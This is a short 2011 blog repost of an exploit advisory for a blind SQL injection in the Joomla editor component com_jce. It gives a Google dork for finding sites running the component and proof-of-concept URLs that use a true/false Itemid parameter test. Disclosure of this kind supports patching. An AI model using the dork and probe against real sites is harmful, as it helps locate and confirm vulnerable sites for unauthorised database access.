BLIND sql injection vulnerability

Posted: April 11, 2011 in Analysis, cracking

===================================================================

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

===================================================================

Software: joomlacontenteditor (com_jce)

Vendor: http://www.joomlacontenteditor.net

Vuln Type: BLind SQL Injection

Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/j
oomla-15-2 (check here)

Author: eidelweiss

contact: eidelweiss[at]windowslive[dot]com

Home: http://www.eidelweiss.info

Dork: inurl:”/index.php?option=com_jce”

References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-co
mjce-blind-sql.html

===================================================================

Description:

JCE makes creating and editing Joomla!®

content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS…

===================================================================

exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8 <= True

[!] http://host/index.php?option=com_jce&Itemid=-8 <= False

====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s